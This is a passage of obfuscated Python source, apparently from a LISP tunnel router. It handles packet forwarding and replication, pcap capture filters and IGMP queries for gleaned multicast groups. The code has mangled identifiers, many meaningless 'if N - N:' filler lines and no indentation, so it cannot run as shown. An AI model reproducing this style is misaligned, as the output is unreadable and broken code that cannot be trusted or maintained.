if 29 - 29: OoooooooOO . I1IiiI % I1ii11iIi11i - iII111i
if 8 - 8: i1IIi
if 32 - 32: oO0o / II111iiii
if 45 - 45: I1ii11iIi11i + OoO0O00 * i11iIiiIii / OOooOOo % I11i * O0
if 17 - 17: O0
if 88 - 88: Oo0Ooo . O0 % OoooooooOO / OOooOOo
if ( o00oo0 and o00oo0 . refresh ( ) ) :
if ( lisp . lisp_rate_limit_map_request ( O0O0oOOo0O . inner_dest ) == False ) :
lisp . lprint ( "Refresh map-cache entry {}" . format ( lisp . green ( o00oo0 . print_eid_tuple ( ) , False ) ) )
if 89 - 89: II111iiii / oO0o
lisp . lisp_send_map_request ( Oo0o , Ooo ,
O0O0oOOo0O . inner_source , O0O0oOOo0O . inner_dest , None )
if 14 - 14: OOooOOo . I1IiiI * ooOoO0o + II111iiii - ooOoO0o + OOooOOo
if 18 - 18: oO0o - o0oOOo0O0Ooo - I1IiiI - I1IiiI
if 54 - 54: Oo0Ooo + I1IiiI / iII111i . I1IiiI * OoOoOO00
if 1 - 1: OoOoOO00 * OoO0O00 . i1IIi / Oo0Ooo . I1ii11iIi11i + Oo0Ooo
if 17 - 17: Oo0Ooo + OoO0O00 / Ii1I / iII111i * OOooOOo
if 29 - 29: OoO0O00 % OoooooooOO * oO0o / II111iiii - oO0o
if 19 - 19: i11iIiiIii
o00oo0 . last_refresh_time = time . time ( )
o00oo0 . stats . increment ( len ( O0O0oOOo0O . packet ) )
if 54 - 54: II111iiii . I11i
if 73 - 73: OoOoOO00 . I1IiiI
if 32 - 32: OoOoOO00 * I1IiiI % ooOoO0o * Ii1I . O0
if 48 - 48: iII111i * iII111i
I1I1 , iI1I1iiIi1I , I11iIiii1 , iIIIiiiI11I , I1ii1111Ii , i1I1iI1iIi111i = o00oo0 . select_rloc ( O0O0oOOo0O , None )
if 69 - 69: IiII . OoO0O00 + II111iiii
if 70 - 70: I1IiiI / I11i
if ( I1I1 == None and I1ii1111Ii == None ) :
if ( iIIIiiiI11I == lisp . LISP_NATIVE_FORWARD_ACTION ) :
lisp . dprint ( "Natively forwarding" )
O0O0oOOo0O . send_packet ( o0oOoO00o , O0O0oOOo0O . inner_dest )
if 28 - 28: I1ii11iIi11i * OoooooooOO . II111iiii / i11iIiiIii + oO0o
if ( O0O0oOOo0O . is_trace ( ) ) :
iiIii1ii = OOO0o0o
OOOo = "not an EID"
lisp . lisp_trace_append ( O0O0oOOo0O , reason = OOOo , lisp_socket = iiIii1ii )
if 38 - 38: IiII . Ii1I
OO0000o ( Iii1iiIi1II , "RTR" )
return
if 24 - 24: o0oOOo0O0Ooo - o0oOOo0O0Ooo + I1ii11iIi11i + I1IiiI - oO0o
OOOo = "No reachable RLOCs found"
lisp . dprint ( OOOo )
if 12 - 12: iII111i . IiII . OoOoOO00 / O0
if ( O0O0oOOo0O . is_trace ( ) ) :
iiIii1ii = OOO0o0o
lisp . lisp_trace_append ( O0O0oOOo0O , reason = OOOo , lisp_socket = iiIii1ii )
if 58 - 58: o0oOOo0O0Ooo - II111iiii % oO0o + I1Ii111 . OoOoOO00 / IiII
return
if 8 - 8: I1ii11iIi11i . OoO0O00 * I11i + II111iiii % i11iIiiIii
if ( I1I1 and I1I1 . is_null ( ) ) :
lisp . dprint ( "Drop action RLOC found" )
if 8 - 8: ooOoO0o * O0
if ( O0O0oOOo0O . is_trace ( ) ) :
iiIii1ii = OOO0o0o
OOOo = "drop action"
lisp . lisp_trace_append ( O0O0oOOo0O , reason = OOOo , lisp_socket = iiIii1ii )
if 73 - 73: o0oOOo0O0Ooo / oO0o / I11i / OoO0O00
return
if 11 - 11: OoOoOO00 + IiII - OoooooooOO / OoO0O00
if 34 - 34: ooOoO0o
if 45 - 45: ooOoO0o / Oo0Ooo / Ii1I
if 44 - 44: I1ii11iIi11i - Ii1I / II111iiii * OoO0O00 * Oo0Ooo
if 73 - 73: o0oOOo0O0Ooo - I1IiiI * i1IIi / i11iIiiIii * OOooOOo % II111iiii
O0O0oOOo0O . outer_tos = O0O0oOOo0O . inner_tos
O0O0oOOo0O . outer_ttl = O0O0oOOo0O . inner_ttl
if 56 - 56: OoooooooOO * Oo0Ooo . Oo0Ooo . I1ii11iIi11i
if 24 - 24: Oo0Ooo . I11i * Ii1I % iII111i / OOooOOo
if 58 - 58: I1IiiI - I1ii11iIi11i % O0 . I1IiiI % OoO0O00 % IiII
if 87 - 87: oO0o - i11iIiiIii
if ( I1I1 ) :
O0O0oOOo0O . encap_port = iI1I1iiIi1I
if ( iI1I1iiIi1I == 0 ) : O0O0oOOo0O . encap_port = lisp . LISP_DATA_PORT
O0O0oOOo0O . outer_dest . copy_address ( I1I1 )
ooOoO = O0O0oOOo0O . outer_dest . afi_to_version ( )
O0O0oOOo0O . outer_version = ooOoO
if 23 - 23: I11i
iIiiIiiIi = iIiiI1 if ( ooOoO == 4 ) else lisp . lisp_myrlocs [ 1 ]
if 40 - 40: o0oOOo0O0Ooo
O0O0oOOo0O . outer_source . copy_address ( iIiiIiiIi )
if 78 - 78: iIii1I11I1II1
if ( O0O0oOOo0O . is_trace ( ) ) :
iiIii1ii = OOO0o0o
if ( lisp . lisp_trace_append ( O0O0oOOo0O , rloc_entry = i1I1iI1iIi111i ,
lisp_socket = iiIii1ii ) == False ) : return
if 56 - 56: OoooooooOO - I11i - i1IIi
if 8 - 8: I1Ii111 / OOooOOo . I1IiiI + I1ii11iIi11i / i11iIiiIii
if 31 - 31: ooOoO0o - iIii1I11I1II1 + iII111i . Oo0Ooo / IiII % iIii1I11I1II1
if 6 - 6: IiII * i11iIiiIii % iIii1I11I1II1 % i11iIiiIii + o0oOOo0O0Ooo / i1IIi
if 53 - 53: I11i + iIii1I11I1II1
if ( O0O0oOOo0O . encode ( I11iIiii1 ) == None ) : return
if ( len ( O0O0oOOo0O . packet ) <= 1500 ) : O0O0oOOo0O . print_packet ( "Send" , True )
if 70 - 70: I1ii11iIi11i
if 67 - 67: OoooooooOO
if 29 - 29: O0 - i11iIiiIii - II111iiii + OOooOOo * IiII
if 2 - 2: i1IIi - ooOoO0o + I1IiiI . o0oOOo0O0Ooo * o0oOOo0O0Ooo / OoOoOO00
oOOO = i1 if ooOoO == 6 else o0oOoO00o
O0O0oOOo0O . send_packet ( oOOO , O0O0oOOo0O . outer_dest )
if 16 - 16: oO0o + ooOoO0o / o0oOOo0O0Ooo
elif ( I1ii1111Ii ) :
if 82 - 82: IiII * i11iIiiIii % II111iiii - OoooooooOO
if 90 - 90: Oo0Ooo . oO0o * i1IIi - i1IIi
if 16 - 16: I1IiiI * i1IIi - o0oOOo0O0Ooo . IiII % I11i / o0oOOo0O0Ooo
if 14 - 14: iIii1I11I1II1 * I1Ii111 * I1ii11iIi11i / iIii1I11I1II1 * IiII / I11i
OOO000 = len ( O0O0oOOo0O . packet )
for Ii1 in I1ii1111Ii . rle_forwarding_list :
O0O0oOOo0O . outer_dest . copy_address ( Ii1 . address )
O0O0oOOo0O . encap_port = lisp . LISP_DATA_PORT if Ii1 . translated_port == 0 else Ii1 . translated_port
if 62 - 62: i1IIi - i1IIi
if 69 - 69: OoOoOO00 % oO0o - I11i
ooOoO = O0O0oOOo0O . outer_dest . afi_to_version ( )
O0O0oOOo0O . outer_version = ooOoO
if 38 - 38: iIii1I11I1II1 + i11iIiiIii / i11iIiiIii % OoO0O00 / ooOoO0o % Ii1I
iIiiIiiIi = iIiiI1 if ( ooOoO == 4 ) else lisp . lisp_myrlocs [ 1 ]
if 7 - 7: IiII * I1IiiI + i1IIi + i11iIiiIii + Oo0Ooo % I1IiiI
O0O0oOOo0O . outer_source . copy_address ( iIiiIiiIi )
if 62 - 62: o0oOOo0O0Ooo - Ii1I * OoOoOO00 - i11iIiiIii % ooOoO0o
if ( O0O0oOOo0O . is_trace ( ) ) :
iiIii1ii = OOO0o0o
OOOo = "replicate"
if ( lisp . lisp_trace_append ( O0O0oOOo0O , reason = OOOo , lisp_socket = iiIii1ii ) == False ) : return
if 52 - 52: I1ii11iIi11i % oO0o - i11iIiiIii
if 30 - 30: iII111i / OoO0O00 + oO0o
if 6 - 6: iII111i . I11i + Ii1I . I1Ii111
if ( O0O0oOOo0O . encode ( None ) == None ) : return
if 70 - 70: OoO0O00
O0O0oOOo0O . print_packet ( "Replicate-to-L{}" . format ( Ii1 . level ) , True )
O0O0oOOo0O . send_packet ( o0oOoO00o , O0O0oOOo0O . outer_dest )
if 46 - 46: I11i - i1IIi
if 46 - 46: I1Ii111 % Ii1I
if 72 - 72: iIii1I11I1II1
if 45 - 45: Oo0Ooo - o0oOOo0O0Ooo % I1Ii111
if 38 - 38: I1Ii111 % OOooOOo - OoooooooOO
oOo0OOoooO = len ( O0O0oOOo0O . packet ) - OOO000
O0O0oOOo0O . packet = O0O0oOOo0O . packet [ oOo0OOoooO : : ]
if 26 - 26: o0oOOo0O0Ooo * IiII . i1IIi
if ( lisp . lisp_flow_logging ) : O0O0oOOo0O = copy . deepcopy ( O0O0oOOo0O )
if 59 - 59: O0 + i1IIi - o0oOOo0O0Ooo
if 62 - 62: i11iIiiIii % OOooOOo . IiII . OOooOOo
if 84 - 84: i11iIiiIii * OoO0O00
if 18 - 18: OOooOOo - Ii1I - OoOoOO00 / I1Ii111 - O0
if 30 - 30: O0 + I1ii11iIi11i + II111iiii
if 14 - 14: o0oOOo0O0Ooo / OOooOOo - iIii1I11I1II1 - oO0o % ooOoO0o
del ( O0O0oOOo0O )
if 49 - 49: ooOoO0o * oO0o / o0oOOo0O0Ooo / Oo0Ooo * iIii1I11I1II1
OO0000o ( Iii1iiIi1II , "RTR" )
return
if 57 - 57: OoOoOO00 - oO0o / ooOoO0o % i11iIiiIii
if 3 - 3: iII111i . ooOoO0o % I1IiiI + I1ii11iIi11i
if 64 - 64: i1IIi
if 29 - 29: o0oOOo0O0Ooo / i11iIiiIii / I1IiiI % oO0o % i11iIiiIii
if 18 - 18: OOooOOo + I1Ii111
if 80 - 80: oO0o + o0oOOo0O0Ooo * Ii1I + OoO0O00
if 75 - 75: I11i / o0oOOo0O0Ooo / OOooOOo / IiII % ooOoO0o + II111iiii
def I1III111i ( lisp_thread ) :
lisp . lisp_set_exception ( )
while ( True ) :
if 4 - 4: i1IIi + ooOoO0o + i1IIi
if 31 - 31: Ii1I
if 78 - 78: i11iIiiIii + o0oOOo0O0Ooo + I1Ii111 / o0oOOo0O0Ooo % iIii1I11I1II1 % IiII
if 83 - 83: iIii1I11I1II1 % OoOoOO00 % o0oOOo0O0Ooo % I1Ii111 . I1ii11iIi11i % O0
O0O0oOOo0O = lisp_thread . input_queue . get ( )
if 47 - 47: o0oOOo0O0Ooo
if 66 - 66: I1IiiI - IiII
if 33 - 33: I1IiiI / OoO0O00
if 12 - 12: II111iiii
lisp_thread . input_stats . increment ( len ( O0O0oOOo0O ) )
if 2 - 2: i1IIi - I1IiiI + I11i . II111iiii
if 25 - 25: oO0o
if 34 - 34: OoOoOO00 . iIii1I11I1II1 % O0
if 43 - 43: I1ii11iIi11i - iII111i
lisp_thread . lisp_packet . packet = O0O0oOOo0O
if 70 - 70: iII111i / OOooOOo % ooOoO0o - Ii1I
if 47 - 47: iII111i
if 92 - 92: OOooOOo + OoOoOO00 % i1IIi
if 23 - 23: I1Ii111 - OOooOOo + Ii1I - OoOoOO00 * OoOoOO00 . Oo0Ooo
Ii1ii111i1 ( lisp_thread . lisp_packet , lisp_thread . thread_name )
if 47 - 47: oO0o % iIii1I11I1II1
return
if 11 - 11: I1IiiI % Ii1I - OoO0O00 - oO0o + o0oOOo0O0Ooo
if 98 - 98: iII111i + Ii1I - OoO0O00
if 79 - 79: OOooOOo / I1Ii111 . OoOoOO00 - I1ii11iIi11i
if 47 - 47: OoooooooOO % O0 * iII111i . Ii1I
if 38 - 38: O0 - IiII % I1Ii111
if 64 - 64: iIii1I11I1II1
if 15 - 15: I1ii11iIi11i + OOooOOo / I1ii11iIi11i / I1Ii111
if 31 - 31: ooOoO0o + O0 + ooOoO0o . iIii1I11I1II1 + Oo0Ooo / o0oOOo0O0Ooo
def II11i1IiIII ( thread ) :
oO00 = ( time . time ( ) % thread . number_of_pcap_threads )
return ( int ( oO00 ) == thread . thread_number )
if 16 - 16: iIii1I11I1II1 % i11iIiiIii . OoOoOO00 % ooOoO0o + oO0o . OoO0O00
if 46 - 46: OoO0O00 - o0oOOo0O0Ooo / OoOoOO00 - OoooooooOO + oO0o
if 58 - 58: o0oOOo0O0Ooo / o0oOOo0O0Ooo + ooOoO0o + I11i - OoOoOO00 . OOooOOo
if 15 - 15: ooOoO0o * OoOoOO00 % IiII . OoOoOO00 . I11i
if 97 - 97: oO0o
if 80 - 80: I1IiiI . Ii1I
if 47 - 47: I11i + ooOoO0o + II111iiii % i11iIiiIii
if 93 - 93: I1ii11iIi11i % OoOoOO00 . O0 / iII111i * oO0o
def i1iii1ii ( parms , not_used , packet ) :
if ( II11i1IiIII ( parms [ 1 ] ) == False ) : return
if 18 - 18: OoO0O00 . II111iiii % OoOoOO00 % Ii1I
oo0 = parms [ 0 ]
i1iIIi1II1iiI = parms [ 1 ]
III1Ii1i1I1 = i1iIIi1II1iiI . number_of_worker_threads
if 97 - 97: I1Ii111 . ooOoO0o - I1Ii111 + I1IiiI * II111iiii
i1iIIi1II1iiI . input_stats . increment ( len ( packet ) )
if 10 - 10: Ii1I + I11i % OoooooooOO - I1IiiI
if 70 - 70: OOooOOo - iII111i
if 2 - 2: iIii1I11I1II1
if 45 - 45: OoooooooOO / i11iIiiIii
if 10 - 10: iII111i - oO0o * iIii1I11I1II1 % iIii1I11I1II1 * IiII - I1ii11iIi11i
if 97 - 97: II111iiii % I1Ii111 + I1Ii111 - OoO0O00 / Ii1I * I1IiiI
iIii1iII1Ii = 4 if oo0 == "lo0" else ( 14 if lisp . lisp_is_macos ( ) else 16 )
packet = packet [ iIii1iII1Ii : : ]
if 50 - 50: Ii1I
if 22 - 22: I11i * O0 . II111iiii - OoO0O00
if 90 - 90: oO0o
if 94 - 94: I11i / I1ii11iIi11i * I1Ii111 - OoOoOO00
if ( III1Ii1i1I1 ) :
I1Ii11II1I1 = i1iIIi1II1iiI . input_stats . packet_count % III1Ii1i1I1
I1Ii11II1I1 = I1Ii11II1I1 + ( len ( O0ooo00OOo00 ) - III1Ii1i1I1 )
IiI1iI1IiiIi1 = O0ooo00OOo00 [ I1Ii11II1I1 ]
IiI1iI1IiiIi1 . input_queue . put ( packet )
else :
i1iIIi1II1iiI . lisp_packet . packet = packet
Ii1ii111i1 ( i1iIIi1II1iiI . lisp_packet , i1iIIi1II1iiI . thread_name )
if 90 - 90: O0 + I11i - OoooooooOO . I11i
return
if 60 - 60: o0oOOo0O0Ooo . o0oOOo0O0Ooo / iII111i
if 45 - 45: O0 . i11iIiiIii % iII111i . OoOoOO00 % IiII % iIii1I11I1II1
if 58 - 58: iIii1I11I1II1 . OoOoOO00 - i11iIiiIii * iIii1I11I1II1 % i11iIiiIii / I1IiiI
if 80 - 80: I1ii11iIi11i / iIii1I11I1II1 % OoOoOO00
if 80 - 80: OoO0O00 % iII111i
if 99 - 99: ooOoO0o / iIii1I11I1II1 - Ii1I * I1ii11iIi11i % I1IiiI
if 13 - 13: OoO0O00
if 70 - 70: I1Ii111 + O0 . oO0o * Ii1I
def ii ( lisp_thread ) :
lisp . lisp_set_exception ( )
if ( lisp . lisp_myrlocs [ 0 ] == None ) : return
if 9 - 9: OoO0O00 * Ii1I % i1IIi % oO0o
oo0 = "lo0" if lisp . lisp_is_macos ( ) else "any"
if 53 - 53: oO0o * OoooooooOO . OoOoOO00
if 96 - 96: I1IiiI % i1IIi . o0oOOo0O0Ooo . O0
if 37 - 37: i1IIi - OOooOOo % OoooooooOO / OOooOOo % ooOoO0o
if 48 - 48: i11iIiiIii % oO0o
if 29 - 29: iII111i + i11iIiiIii % I11i
oOo00Ooo0o0 = getoutput ( "egrep 'lisp-nat = yes' ./lisp.config" )
oOo00Ooo0o0 = ( oOo00Ooo0o0 != "" and oOo00Ooo0o0 [ 0 ] == " " )
if 33 - 33: I11i
oOO0 = "(dst host "
IIi1I1i = ""
for iI1Iii in lisp . lisp_get_all_addresses ( ) :
oOO0 += "{} or " . format ( iI1Iii )
IIi1I1i += "{} or " . format ( iI1Iii )
if 13 - 13: iIii1I11I1II1 . OoOoOO00 * I1IiiI / oO0o * Ii1I
oOO0 = oOO0 [ 0 : - 4 ]
oOO0 += ") and ((udp dst port 4341 or 8472 or 4789) or "
oOO0 += "(proto 17 and (ip[6]&0xe0 == 0x20 or " + "(ip[6]&0xe0 == 0 and ip[7] != 0))))"
if 64 - 64: ooOoO0o / O0 * OoOoOO00 * ooOoO0o
if 60 - 60: I11i / i1IIi % I1ii11iIi11i / I1ii11iIi11i * I1ii11iIi11i . i11iIiiIii
if 99 - 99: OoOoOO00
if 77 - 77: o0oOOo0O0Ooo
if 48 - 48: OoOoOO00 % I1ii11iIi11i / I11i . iIii1I11I1II1 * II111iiii
if 65 - 65: OoOoOO00
IIi1I1i = IIi1I1i [ 0 : - 4 ]
oOO0 += ( " or (not (src host {}) and " + "((udp src port 4342 and ip[28] == 0x28) or " + "(udp dst port 4342 and ip[28] == 0x12)))" ) . format ( IIi1I1i )
if 31 - 31: I11i * OoOoOO00 . IiII % Ii1I + Oo0Ooo
if 47 - 47: O0 * I1IiiI * OoO0O00 . II111iiii
if 95 - 95: Ii1I % IiII . O0 % I1Ii111
if ( oOo00Ooo0o0 ) :
oOO0 += ( " or (dst net 0.0.0.0/0 and " + "not (host {} or src net 127.0.0.0/8))" ) . format ( IIi1I1i )
if 68 - 68: Oo0Ooo . Oo0Ooo - I1ii11iIi11i / I11i . ooOoO0o / i1IIi
if 12 - 12: I1ii11iIi11i * i1IIi * I11i
if 23 - 23: OOooOOo / O0 / I1IiiI
lisp . lprint ( "Capturing packets for: '{}'" . format ( oOO0 ) )
if 49 - 49: I11i . o0oOOo0O0Ooo % oO0o / Ii1I
if 95 - 95: O0 * OoOoOO00 * IiII . ooOoO0o / iIii1I11I1II1
if 28 - 28: IiII + oO0o - ooOoO0o / iIii1I11I1II1 - I1IiiI
if 45 - 45: O0 / i1IIi * oO0o * OoO0O00
if ( lisp . lisp_is_python2 ( ) ) :
II11I = pcappy . open_live ( oo0 , 9000 , 0 , 100 )
II11I . filter = oOO0
II11I . loop ( - 1 , i1iii1ii , [ oo0 , lisp_thread ] )
if 31 - 31: Ii1I
if ( lisp . lisp_is_python3 ( ) ) :
II11I = pcapy . open_live ( oo0 , 9000 , 0 , 100 )
II11I . setfilter ( oOO0 )
while ( True ) :
i11i11 , O0O0oOOo0O = II11I . next ( )
i1iii1ii ( [ oo0 , lisp_thread ] , None , O0O0oOOo0O )
if 18 - 18: ooOoO0o + Ii1I
if 5 - 5: OoooooooOO + I11i * II111iiii
return
if 98 - 98: OOooOOo % i1IIi . I1IiiI . II111iiii . I1ii11iIi11i / i11iIiiIii
if 32 - 32: o0oOOo0O0Ooo + I1IiiI . I1Ii111
if 41 - 41: OoOoOO00 . i11iIiiIii / I11i
if 98 - 98: OoOoOO00 % II111iiii
if 95 - 95: iIii1I11I1II1 - I1Ii111 - OOooOOo + I1Ii111 % I1ii11iIi11i . I1IiiI
if 41 - 41: O0 + oO0o . i1IIi - II111iiii * o0oOOo0O0Ooo . OoO0O00
if 68 - 68: o0oOOo0O0Ooo
if 20 - 20: I1Ii111 - I1Ii111
def iIIiI11i1I11 ( lisp_raw_socket , eid , geid , igmp ) :
if 29 - 29: OoO0O00 * iIii1I11I1II1 * O0 - OoOoOO00 / IiII
if 99 - 99: ooOoO0o
if 76 - 76: OoO0O00
if 92 - 92: I11i - iIii1I11I1II1 % OoooooooOO
O0O0oOOo0O = lisp . lisp_packet ( igmp )
if 39 - 39: iII111i . I1IiiI * OoOoOO00 - i11iIiiIii
if 1 - 1: iII111i * OoOoOO00
if 66 - 66: OoOoOO00 + i1IIi % II111iiii . O0 * I1ii11iIi11i % I1ii11iIi11i
if 87 - 87: OOooOOo + o0oOOo0O0Ooo . iII111i - OoooooooOO
o00oo0 = lisp . lisp_map_cache_lookup ( eid , geid )
if ( o00oo0 == None ) : return
if ( o00oo0 . rloc_set == [ ] ) : return
if ( o00oo0 . rloc_set [ 0 ] . rle == None ) : return
if 6 - 6: iIii1I11I1II1 * OoooooooOO
iIiI1I1ii1I1 = eid . print_address_no_iid ( )
for iiIi1IIi1I in o00oo0 . rloc_set [ 0 ] . rle . rle_nodes :
if ( iiIi1IIi1I . rloc_name == iIiI1I1ii1I1 ) :
O0O0oOOo0O . outer_dest . copy_address ( iiIi1IIi1I . address )
O0O0oOOo0O . encap_port = iiIi1IIi1I . translated_port
break
if 83 - 83: OOooOOo / O0 % iII111i - o0oOOo0O0Ooo . Oo0Ooo
if 49 - 49: iIii1I11I1II1 * i1IIi . OoooooooOO
if ( O0O0oOOo0O . outer_dest . is_null ( ) ) : return
if 90 - 90: o0oOOo0O0Ooo % I1ii11iIi11i - iIii1I11I1II1 % OoOoOO00
O0O0oOOo0O . outer_source . copy_address ( lisp . lisp_myrlocs [ 0 ] )
O0O0oOOo0O . outer_version = O0O0oOOo0O . outer_dest . afi_to_version ( )
O0O0oOOo0O . outer_ttl = 32
O0O0oOOo0O . inner_source . copy_address ( lisp . lisp_myrlocs [ 0 ] )
O0O0oOOo0O . inner_dest . store_address ( "[{}]224.0.0.1" . format ( geid . instance_id ) )
O0O0oOOo0O . inner_ttl = 1
if 8 - 8: OoOoOO00 * Oo0Ooo / IiII % Ii1I - I1IiiI
o000O0o = lisp . green ( eid . print_address ( ) , False )
OOOo = lisp . red ( "{}:{}" . format ( O0O0oOOo0O . outer_dest . print_address_no_iid ( ) ,
O0O0oOOo0O . encap_port ) , False )
oo0ooooo00o = lisp . bold ( "IGMP Query" , False )
if 78 - 78: iIii1I11I1II1 . o0oOOo0O0Ooo % iIii1I11I1II1 . O0 / OOooOOo
lisp . lprint ( "Data encapsulate {} to gleaned EID {}, RLOC {}" . format ( oo0ooooo00o , o000O0o , OOOo ) )
if 76 - 76: i1IIi * OoooooooOO * O0 + I1Ii111 * I1Ii111
if 35 - 35: o0oOOo0O0Ooo
if 73 - 73: O0 - I1ii11iIi11i
if 2 - 2: II111iiii / I1Ii111
if 54 - 54: i1IIi . I11i - I1ii11iIi11i + ooOoO0o + Oo0Ooo / Oo0Ooo
if ( O0O0oOOo0O . encode ( None ) == None ) : return
O0O0oOOo0O . print_packet ( "Send" , True )
if 22 - 22: ooOoO0o . iIii1I11I1II1
O0O0oOOo0O . send_packet ( lisp_raw_socket , O0O0oOOo0O . outer_dest )
if 12 - 12: Ii1I
if 71 - 71: I1IiiI . II111iiii . I1IiiI - ooOoO0o
if 45 - 45: IiII / O0 / OoOoOO00 * OOooOOo
if 18 - 18: iIii1I11I1II1 + OOooOOo + iIii1I11I1II1 . I1ii11iIi11i + I1Ii111 . ooOoO0o
if 7 - 7: I1ii11iIi11i + iIii1I11I1II1 * I11i * I11i / II111iiii - Ii1I
if 65 - 65: oO0o + OoOoOO00 + II111iiii
if 77 - 77: II111iiii
if 50 - 50: O0 . O0 . ooOoO0o % Oo0Ooo
if 68 - 68: oO0o
if 10 - 10: Ii1I
if 77 - 77: OOooOOo / II111iiii + IiII + ooOoO0o - i11iIiiIii
if 44 - 44: I1IiiI + OoOoOO00 + I1ii11iIi11i . I1IiiI * OoOoOO00 % iIii1I11I1II1
if 72 - 72: OOooOOo . OOooOOo - I1ii11iIi11i
if 48 - 48: Oo0Ooo - ooOoO0o + Oo0Ooo - I1IiiI * i11iIiiIii . iII111i
if 35 - 35: IiII . O0 + Oo0Ooo + OOooOOo + i1IIi
if 65 - 65: O0 * I1IiiI / I1IiiI . OoOoOO00
if 87 - 87: II111iiii * I1ii11iIi11i % Oo0Ooo * Oo0Ooo
if 58 - 58: OOooOOo . o0oOOo0O0Ooo + I1IiiI % Oo0Ooo - OoO0O00
if 50 - 50: iII111i % II111iiii - ooOoO0o . i1IIi + O0 % iII111i
if 10 - 10: iII111i . i1IIi + Ii1I
if 66 - 66: OoO0O00 % o0oOOo0O0Ooo
if 21 - 21: OoOoOO00 - OoooooooOO % i11iIiiIii
if 71 - 71: i1IIi - I11i * I1Ii111 + oO0o - OoO0O00 % I1ii11iIi11i
if 63 - 63: iIii1I11I1II1 + OOooOOo . OoO0O00 / I1IiiI
if 84 - 84: i1IIi
def IiIIiii1I ( lisp_raw_socket ) :
if ( lisp . lisp_gleaned_groups == { } ) : return
if 56 - 56: i11iIiiIii - iIii1I11I1II1 . II111iiii
if 81 - 81: IiII / OoOoOO00 * IiII . O0
if 61 - 61: OoO0O00 * OOooOOo + I1Ii111 . iIii1I11I1II1 % I11i . I1Ii111
if 53 - 53: I1Ii111 * IiII / iIii1I11I1II1 / I1IiiI % I1ii11iIi11i
if 39 - 39: OoO0O00 / OoooooooOO . OoO0O00 * I1ii11iIi11i / OoOoOO00
II111 = "\x46\xc0\x00\x24\x00\x00\x40\x00\x01\x02\x00\x00"
o0o0O0O000 = lisp . lisp_myrlocs [ 0 ]
Oo0OoO00oOO0o = o0o0O0O000 . address
II111 += chr ( ( Oo0OoO00oOO0o >> 24 ) & 0xff )
II111 += chr ( ( Oo0OoO00oOO0o >> 16 ) & 0xff )
II111 += chr ( ( Oo0OoO00oOO0o >> 8 ) & 0xff )
II111 += chr ( Oo0OoO00oOO0o & 0xff )
II111 += "\xe0\x00\x00\x01"
II111 += "\x94\x04\x00\x00"
II111 = lisp . lisp_ip_checksum ( II111 , 24 )
if 24 - 24: ooOoO0o / iII111i + IiII . IiII
if 39 - 39: ooOoO0o + O0 / i1IIi % IiII / oO0o * IiII
if 77 - 77: IiII . I1Ii111 % OoOoOO00
if 42 - 42: IiII % iII111i % o0oOOo0O0Ooo % oO0o + I11i % OoOoOO00
if 3 - 3: oO0o
iiii1I1 = "\x11\x64\x00\x00" + "\x00\x00\x00\x00" + "\x02\x3c\x00\x00"
iiii1I1 = lisp . lisp_igmp_checksum ( iiii1I1 )
if 64 - 64: OoO0O00 . I1IiiI - OoooooooOO . ooOoO0o - iII111i
if 77 - 77: Ii1I % OoOoOO00 / II111iiii % iII111i % OoooooooOO % OoO0O00
if 19 - 19: IiII * I1Ii111 / oO0o * I1Ii111 - OoooooooOO * I11i
if 17 - 17: II111iiii + Oo0Ooo . I1Ii111
if 12 - 12: I1Ii111 + OOooOOo + I11i . IiII / Ii1I
o00oO0oo0OO = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , "" , 32 , 0 )
i1OOO = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , "" , 32 , 0 )
if 29 - 29: IiII . ooOoO0o - II111iiii
for Ii1iIiII1ii1 in lisp . lisp_gleaned_groups :
o00oO0oo0OO . store_address ( Ii1iIiII1ii1 )
for ooooO0 in lisp . lisp_gleaned_groups [ Ii1iIiII1ii1 ] :
i1OOO . store_address ( ooooO0 )
oO00oo0o00o0o , IiIIIIIi , Iiii111 = lisp . lisp_allow_gleaning ( o00oO0oo0OO , i1OOO , None )
if ( Iiii111 == False ) : continue
iIIiI11i1I11 ( lisp_raw_socket , o00oO0oo0OO , i1OOO , II111 + iiii1I1 )
if 71 - 71: O0 / I1IiiI . I1Ii111 / I1Ii111 * ooOoO0o
if 60 - 60: II111iiii . I1IiiI - Oo0Ooo + I1ii11iIi11i * I1ii11iIi11i
if 27 - 27: IiII * I1IiiI . iIii1I11I1II1 - iIii1I11I1II1
if 5 - 5: IiII
if 84 - 84: II111iiii * oO0o * II111iiii % IiII / I1IiiI
if 100 - 100: IiII . Ii1I - iIii1I11I1II1 . i11iIiiIii / II111iiii
if 71 - 71: I1Ii111 * Oo0Ooo . I11i
if 49 - 49: IiII * O0 . IiII
if 19 - 19: II111iiii - IiII
if 59 - 59: o0oOOo0O0Ooo * OoO0O00 - Ii1I . OOooOOo
def o0OO00oo0O ( ) :
o00oO0oo0OO = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , "" , 32 , 0 )
i1OOO = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , "" , 32 , 0 )
if 46 - 46: i11iIiiIii - OOooOOo * I1IiiI * I11i % I1ii11iIi11i * i1IIi
Iii1I = [ ]
for Ii1iIiII1ii1 in lisp . lisp_gleaned_groups :
for ooooO0 in lisp . lisp_gleaned_groups [ Ii1iIiII1ii1 ] :
i1i1i1i1IiII1 = lisp . lisp_gleaned_groups [ Ii1iIiII1ii1 ] [ ooooO0 ]
II1 = time . time ( ) - i1i1i1i1IiII1
if ( II1 < lisp . LISP_IGMP_TIMEOUT_INTERVAL ) : continue
Iii1I . append ( [ Ii1iIiII1ii1 , ooooO0 ] )
if 52 - 52: OoOoOO00 * OoO0O00 - Ii1I
if 82 - 82: OoO0O00 + I1IiiI . i1IIi + OOooOOo
if 16 - 16: o0oOOo0O0Ooo - OoO0O00 / I1Ii111
if 48 - 48: iIii1I11I1II1
if 91 - 91: II111iiii - O0 . iIii1I11I1II1 . O0 + I1ii11iIi11i - II111iiii
if 26 - 26: o0oOOo0O0Ooo
if 12 - 12: OoooooooOO / O0 + II111iiii * I1ii11iIi11i
Ii11ii1I1 = lisp . bold ( "timed out" , False )
for Ii1iIiII1ii1 , ooooO0 in Iii1I :
o00oO0oo0OO . store_address ( Ii1iIiII1ii1 )
i1OOO . store_address ( ooooO0 )
o000O0o = lisp . green ( Ii1iIiII1ii1 , False )
Ii = lisp . green ( ooooO0 , False )
lisp . lprint ( "{} RLE {} for gleaned group {}" . format ( o000O0o , Ii11ii1I1 , Ii ) )
lisp . lisp_remove_gleaned_multicast ( o00oO0oo0OO , i1OOO )
if 18 - 18: IiII % oO0o * OoOoOO00
